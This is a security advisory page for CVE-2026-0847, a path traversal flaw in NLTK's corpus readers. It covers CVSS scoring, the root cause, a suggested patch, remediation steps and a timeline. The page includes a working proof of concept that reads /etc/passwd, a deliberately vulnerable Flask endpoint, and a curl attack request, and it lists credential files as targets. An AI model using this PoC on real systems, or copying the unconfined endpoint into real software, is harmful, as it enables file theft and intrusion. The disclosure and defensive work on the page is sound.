
NLTK 3.9.2 Arbitrary File Read / Path Traversal

Published 31 Mar 2026 · Reported by Sarvesh Patil · Type: packetstorm · Source: packetstorm.news

CVE-2026-0847 in the Natural Language Toolkit (NLTK), versions up to and including 3.9.2, enables arbitrary file read via path traversal in corpus readers.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| ATTACKERKB | CVE-2026-0847 | 4 Mar 2026 18:25 | attackerkb |
| Circl | CVE-2026-0847 | 4 Mar 2026 19:31 | circl |
| CNNVD | NLTK path traversal vulnerability | 4 Mar 2026 00:00 | cnnvd |
| CVE | CVE-2026-0847 | 4 Mar 2026 18:25 | cve |
| Cvelist | CVE-2026-0847 Path Traversal in nltk/nltk | 4 Mar 2026 18:25 | cvelist |
| Debian CVE | CVE-2026-0847 | 4 Mar 2026 18:25 | debiancve |
| IBM Security Bulletins | Security Bulletin: IBM Watson Speech Services Cartridge is vulnerable to a Path Traversal in NLTK [CVE-2026-0847] | 14 Apr 2026 15:13 | ibm |
| EUVD | EUVD-2026-9475 | 4 Mar 2026 21:32 | euvd |
| Huntr | NLTK – Multiple CorpusReader classes allow Arbitrary File Read via Path Traversal | 4 Dec 2025 18:25 | huntr |
| Github Security Blog | NLTK has a Path Traversal issue | 4 Mar 2026 21:32 | github |

# CVE-2026-0847 — NLTK Multiple CorpusReader Classes: Arbitrary File Read via Path Traversal
    
    <p align="center">
      <img src="https://img.shields.io/badge/CVE-2026--0847-red?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Severity-High%20(CVSS%208.6)-orange?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Affected-NLTK%20%3C%3D%203.9.2-yellow?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Type-CWE--22%20Path%20Traversal-blue?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Status-%20Fixed-lightgrey?style=for-the-badge" />
    </p>
    
    ---
    
    ## Overview
    
    | Field | Details |
    |---|---|
    | **CVE ID** | CVE-2026-0847 |
    | **Package** | `nltk` (Natural Language Toolkit) |
    | **Registry** | PyPI |
    | **Affected Versions** | `<= 3.9.2` |
    | **Vulnerability Type** | CWE-22: Path Traversal |
    | **CVSS Score** | 8.6 (High) |
    | **Attack Vector** | Network |
    | **Attack Complexity** | Low |
    | **Privileges Required** | None |
    | **User Interaction** | None |
    | **Confidentiality Impact** | High |
    | **Integrity Impact** | Low |
    | **Availability Impact** | Low |
    | **Reported On** | December 4, 2025 |
    | **CVE Published** | March 4, 2026 |
    | **Supported By** | Palo Alto Networks / Prisma AIRS |
    | **Status** |  Fixed |
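
The 8.6 score can be reproduced from the metrics in the table with the CVSS v3.1 base-score equations. The sketch below is a minimal calculator for this kind of vector; it assumes Scope is Unchanged (the table does not list Scope), and the weights are those published in the FIRST CVSS v3.1 specification.

```python
import math

# CVSS v3.1 metric weights. Scope: Unchanged is an assumption; the advisory does not state it.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in CVSS v3.1 Appendix A."""
    int_input = round(value * 100_000)
    if int_input % 10_000 == 0:
        return int_input / 100_000
    return (math.floor(int_input / 10_000) + 1) / 10


def base_score(av, ac, pr, ui, c, i, a) -> float:
    """Compute a CVSS v3.1 base score for a Scope: Unchanged vector."""
    iss = 1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[av] * AC[ac] * PR_UNCHANGED[pr] * UI[ui]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


# Metrics from the Overview table: AV:N/AC:L/PR:N/UI:N/C:H/I:L/A:L
print(base_score("N", "L", "N", "N", "H", "L", "L"))  # 8.6
```

The same function returns 9.8 for the familiar all-High `C:H/I:H/A:H` network vector, which is a quick sanity check on the weights.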
    
    ---
    
    ## Description
    
    Multiple `CorpusReader` classes in the NLTK library accept file path arguments without applying any path canonicalization, allowlist validation, or sandbox restrictions. When an attacker controls the corpus filename or file input — a common scenario in machine learning APIs, upload-based NLP pipelines, and chatbot services — they can supply a crafted path to traverse the directory hierarchy and read arbitrary files on the server.
    
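    This vulnerability is most serious in networked deployments where NLTK processes user-controlled file paths: if the application forwards request data to a corpus reader, an attacker needs no authentication, privileges, or user interaction to exploit it (matching the `PR:N` and `UI:N` metrics above).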
    
    ---
    
    ## Affected Components
    
    | Class | File | Status |
    |---|---|---|
    | `WordListCorpusReader` | `wordlist.py` L1–L120 | Vulnerable |
    | `TaggedCorpusReader` | `tagged.py` L1–L140 | Vulnerable |
    | `BracketParseCorpusReader` | `bracket_parse.py` L1–L150 | Vulnerable |
    | Other classes using the same base pattern | — | Pending wider audit |
    
    All three classes inherit the same unsafe `CorpusReader.open()` method, which performs no path restriction before resolving and reading the supplied file identifier.
    
    ---
    
    ## Impact
    
    Successful exploitation of this vulnerability can result in:
    
    - **Arbitrary file read** — An attacker can read any file accessible to the process running NLTK, such as `/etc/passwd`, and, when the process runs with elevated privileges, files such as `/etc/shadow` and `/var/log/auth.log`
    - **Credential and secret exposure** — SSH private keys (`~/.ssh/id_rsa`), `.env` files, API tokens, and cloud credential files can be extracted
    - **Source code and training data disclosure** — Other users' training data or proprietary application source code may be read
    - **Remote Code Execution (chained)** — When combined with pickle-deserialization vulnerabilities, path traversal can be used to load malicious model files and escalate to full RCE
    - **Lateral movement** — In microservice environments, extracted secrets can enable lateral movement and, ultimately, full server compromise
    
    ---
    
    ## Proof of Concept
    
    > **This information is provided for educational and defensive purposes only. Do not test against systems you do not own or have explicit authorization to test.**
    
    ### Local File Read via Direct API
    
    ```python
    # PoC.py — demonstrates arbitrary file read using three vulnerable CorpusReader classes
    
    from nltk.corpus.reader import WordListCorpusReader, TaggedCorpusReader, BracketParseCorpusReader
    from nltk.corpus.reader.util import FileSystemPathPointer
    
    root = FileSystemPathPointer("/")   # unrestricted filesystem root
    target = "etc/passwd"               # any sensitive file path
    
    print("--- WordListCorpusReader ---")
    reader1 = WordListCorpusReader(root, [target])
    print(reader1.raw(target)[:200])
    
    print("--- TaggedCorpusReader ---")
    reader2 = TaggedCorpusReader(root, [target])
    print(reader2.raw(target)[:200])
    
    print("--- BracketParseCorpusReader ---")
    reader3 = BracketParseCorpusReader(root, [target])
    print(reader3.raw(target)[:200])
    ```
    
    **Output (abbreviated):**
    
    ```
    --- WordListCorpusReader ---
    root:x:0:0:root:/root:/usr/bin/zsh
    
    --- TaggedCorpusReader ---
    root:x:0:0:root:/root:/usr/bin/zsh
    
    --- BracketParseCorpusReader ---
    root:x:0:0:root:/root:/usr/bin/zsh
    ```
    
    ### Remote Exploit Scenario — Vulnerable Flask API
    
    A realistic scenario where NLTK is exposed via an HTTP API:
    
    ```python
    # Vulnerable API server
    from flask import Flask, request
    from nltk.corpus.reader import WordListCorpusReader
    from nltk.corpus.reader.util import FileSystemPathPointer
    
    app = Flask(__name__)
    root = FileSystemPathPointer("/")
    
    @app.post("/read")
    def read_file():
        filename = request.json.get("file")
        reader = WordListCorpusReader(root, [filename])
        return reader.raw(filename)
    
    if __name__ == "__main__":
        app.run("0.0.0.0", 8000)
    ```
    
    **Attacker request:**
    
    ```bash
    curl -X POST http://TARGET:8000/read \
         -H "Content-Type: application/json" \
         -d '{"file": "etc/passwd"}'
    ```
    
    **Result:** The full contents of `/etc/passwd` are returned to the attacker; the endpoint requires no authentication.
    
    ---
    
    ## Root Cause
    
    The vulnerability originates in `CorpusReader.open()`. The method resolves the supplied `fileid` directly against the configured root path using `FileSystemPathPointer.join()` without performing any of the following checks:
    
    - Absolute path rejection
    - Parent directory traversal (`..`) detection
    - Path normalization and comparison to enforce confinement within the corpus root
    
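    Because nothing confines the joined path to the root, a `fileid` containing `..` segments or an absolute path escapes the corpus directory. When the root is `/` itself, as in the PoC above, an attacker who controls the filename argument has unrestricted read access to the entire filesystem.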
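
The missing confinement can be illustrated with the standard library alone. This sketch assumes, as the root-cause description implies, that `FileSystemPathPointer.join()` amounts to an unchecked `os.path.join()` of the root and the `fileid`; it does not call NLTK. It uses `posixpath` so the results match a Linux server wherever the snippet runs, and the corpus root `/srv/corpus` is a hypothetical example.

```python
import posixpath

CORPUS_ROOT = "/srv/corpus"  # hypothetical corpus directory


def naive_resolve(root: str, fileid: str) -> str:
    """Join root and fileid with no confinement check, then show where the path lands."""
    joined = posixpath.join(root, fileid)  # an absolute fileid discards root entirely
    # normpath collapses '..' segments lexically, the same way the kernel
    # resolves them when the file is opened (symbolic links aside).
    return posixpath.normpath(joined)


for fileid in ["words.txt", "../../etc/passwd", "/etc/passwd"]:
    print(f"{fileid!r:22} -> {naive_resolve(CORPUS_ROOT, fileid)}")
```

Both escaping identifiers land on `/etc/passwd` even though the root is not `/`, which is why the suggested patch rejects absolute paths and `..` segments before joining.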
    
    ---
    
    ## Suggested Patch
    
    Minimal fix proposed by the researcher, to be applied inside `CorpusReader.open()`:
    
    ```python
    import os
    
    normalized = fileid.replace("\\", "/")
    
    # Block absolute paths
    if os.path.isabs(normalized):
        raise ValueError("Absolute paths are not permitted.")
    
    # Block directory traversal sequences
    if ".." in normalized.split("/"):
        raise ValueError("Path traversal sequences are not permitted.")
    
    # Enforce confinement within corpus root
    joined = self._root.join(normalized)
    if not os.path.normpath(joined._path).startswith(
        os.path.normpath(self._root._path)
    ):
        raise ValueError("Path escapes the corpus root directory.")
    ```
    
    The upstream fix PR is available at:
    [https://github.com/nltk/nltk/pull/3479](https://github.com/nltk/nltk/pull/3479)
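
One caveat about the final check in the researcher's patch: `startswith()` compares strings, not path components, so on its own it would accept a sibling such as `/srv/corpus_private` under a root of `/srv/corpus`; and because `normpath` does not resolve symbolic links, a symlink inside the corpus that points elsewhere passes all three checks. The stand-alone sketch below is a stricter variant, not the upstream fix: it resolves both sides with `os.path.realpath()` and compares whole components with `os.path.commonpath()`. The helper name `resolve_within_root` is hypothetical.

```python
import os


def resolve_within_root(root: str, fileid: str) -> str:
    """Return the real path of fileid under root, or raise ValueError if it escapes.

    Hypothetical helper illustrating a stricter confinement check; not NLTK code.
    """
    # realpath resolves symlinks and '..' segments on both sides before comparing.
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, fileid))
    # commonpath compares whole path components, so '/srv/corpus_private' is not
    # mistaken for a child of '/srv/corpus'. On Windows, paths on different
    # drives make commonpath itself raise ValueError, which also blocks them.
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise ValueError(f"fileid {fileid!r} escapes the corpus root")
    return candidate


if __name__ == "__main__":
    root = "/srv/corpus"  # hypothetical corpus directory
    for fileid in ["words.txt", "../corpus_private/x.txt", "/etc/passwd"]:
        try:
            print("allowed:", resolve_within_root(root, fileid))
        except ValueError as exc:
            print("blocked:", exc)
```

If a check like this is adopted, the returned path, rather than the raw `fileid`, is what should be opened, so the value that was validated is the value that is read.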
    
    ---
    
    ## Remediation
    
    | Action | Details |
    |---|---|
    | **Upgrade NLTK** | Update to an NLTK release later than 3.9.2 that includes the upstream fix from PR #3479 (check the release notes to confirm) |
    | **Input Validation** | Sanitize and validate all user-supplied file path values before passing them to any NLTK `CorpusReader` class |
    | **Avoid User-Controlled Paths** | Do not allow user input to directly or indirectly control the `fileids` argument of any `CorpusReader` |
    | **Least Privilege** | Run NLTK-based services under a restricted OS user account with read access limited to the corpus directory only |
    | **Containerization** | Isolate the service in a Docker container or chroot jail to limit the blast radius of a successful traversal |
    | **Ubuntu Patch** | Monitor the [Ubuntu Security Advisory](https://ubuntu.com/security/CVE-2026-0847) for distribution-level package updates |
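
For the **Input Validation** and **Avoid User-Controlled Paths** rows, one option is to accept only identifiers from an allowlist built from the corpus directory at startup, so user input selects a known file instead of naming a path. The sketch below assumes the corpus is a plain directory tree; `build_allowlist` and `checked_fileid` are hypothetical helpers, not NLTK APIs. Symlinks are skipped so an allowlisted name cannot point outside the corpus.

```python
import os


def build_allowlist(corpus_root: str) -> frozenset:
    """Collect '/'-separated relative paths of regular files under corpus_root."""
    allowed = set()
    # os.walk does not descend into symlinked directories by default.
    for dirpath, _dirnames, filenames in os.walk(corpus_root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # skip symlinked files and special files
            rel = os.path.relpath(full, corpus_root)
            allowed.add(rel.replace(os.sep, "/"))
    return frozenset(allowed)


def checked_fileid(user_value: str, allowed: frozenset) -> str:
    """Return user_value unchanged if it names an allowlisted file, else raise ValueError."""
    if user_value not in allowed:
        raise ValueError(f"unknown corpus file: {user_value!r}")
    return user_value
```

Because membership is an exact string match, variants such as `sub/../words.txt` are rejected even when they would resolve to an allowed file. The validated value can then be passed as the `fileids` argument of a corpus reader rooted at the same directory; files added after startup require rebuilding the allowlist.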
    
    **Upgrade via pip:**
    
    ```bash
    pip install --upgrade nltk
    ```
    
    **Verify installed version:**
    
    ```bash
    python -c "import nltk; print(nltk.__version__)"
    ```
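
To check programmatically whether an environment still has an affected release, the installed version can be compared against the `<= 3.9.2` bound from the Overview table. The sketch below uses `importlib.metadata` from the standard library and a deliberately simple numeric parser; that parser is an assumption that ignores pre-release and local-version suffixes, so `packaging.version.Version` is the more robust choice where that package is available.

```python
import re
from importlib.metadata import PackageNotFoundError, version

LAST_AFFECTED = (3, 9, 2)  # from the advisory: NLTK <= 3.9.2 is affected


def parse_release(ver: str) -> tuple:
    """Extract the leading numeric release segment, e.g. '3.9.2' -> (3, 9, 2)."""
    match = re.match(r"\d+(?:\.\d+)*", ver)
    if match is None:
        raise ValueError(f"unrecognised version string: {ver!r}")
    parts = [int(p) for p in match.group().split(".")]
    # Pad to three components so '3.9' compares as (3, 9, 0).
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(ver: str) -> bool:
    return parse_release(ver) <= LAST_AFFECTED


if __name__ == "__main__":
    try:
        installed = version("nltk")
    except PackageNotFoundError:
        print("nltk is not installed")
    else:
        status = "AFFECTED" if is_affected(installed) else "newer than 3.9.2"
        print(f"nltk {installed}: {status}")
```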
    
    ---
    
    ## Timeline
    
    | Date | Event |
    |---|---|
    | December 4, 2025 | Vulnerability reported to huntr.dev by researcher hyperps1 |
    | December 2025 | NLTK maintainer team notified via huntr.dev |
    | January 2026 | NLTK maintainer validated the vulnerability; disclosure bounty awarded to researcher |
    | January 2026 | CVE-2026-0847 assigned |
    | February 2026 | 48-hour pre-publication warning sent to NLTK maintainers |
    | March 4, 2026 | CVE published on NVD and huntr.dev |
    | March 5, 2026 | NVD record last modified |
    
    ---
    
    ## References
    
    | Resource | Link |
    |---|---|
    | NVD Entry | https://nvd.nist.gov/vuln/detail/CVE-2026-0847 |
    | Ubuntu Security Advisory | https://ubuntu.com/security/CVE-2026-0847 |
    | Official CVE Record | https://cve.org/CVERecord?id=CVE-2026-0847 |
    | huntr.dev Report | https://huntr.dev |
    | Fix Pull Request | https://github.com/nltk/nltk/pull/3479 |
    | NLTK on PyPI | https://pypi.org/project/nltk/ |
    | OWASP Path Traversal | https://owasp.org/www-community/attacks/Path_Traversal |
    | CWE-22 | https://cwe.mitre.org/data/definitions/22.html |
    
    ---
    
    ## Disclaimer
    
    This repository documents CVE-2026-0847 strictly for **educational, research, and defensive security purposes**. The proof-of-concept code and technical details are provided to assist developers, security engineers, and system administrators in understanding, assessing, and remediating this vulnerability.
    
    Any use of this information to access systems without explicit authorization is illegal and unethical. The author assumes no liability for misuse of the information contained herein.
    
    
    Contributors: [@mohitf070304](https://github.com/mohitf070304)

Scores (as of 31 Mar 2026): Vulners AI Score 6 (Medium risk) · CVSS 3 base score 8.6 · EPSS 0.0008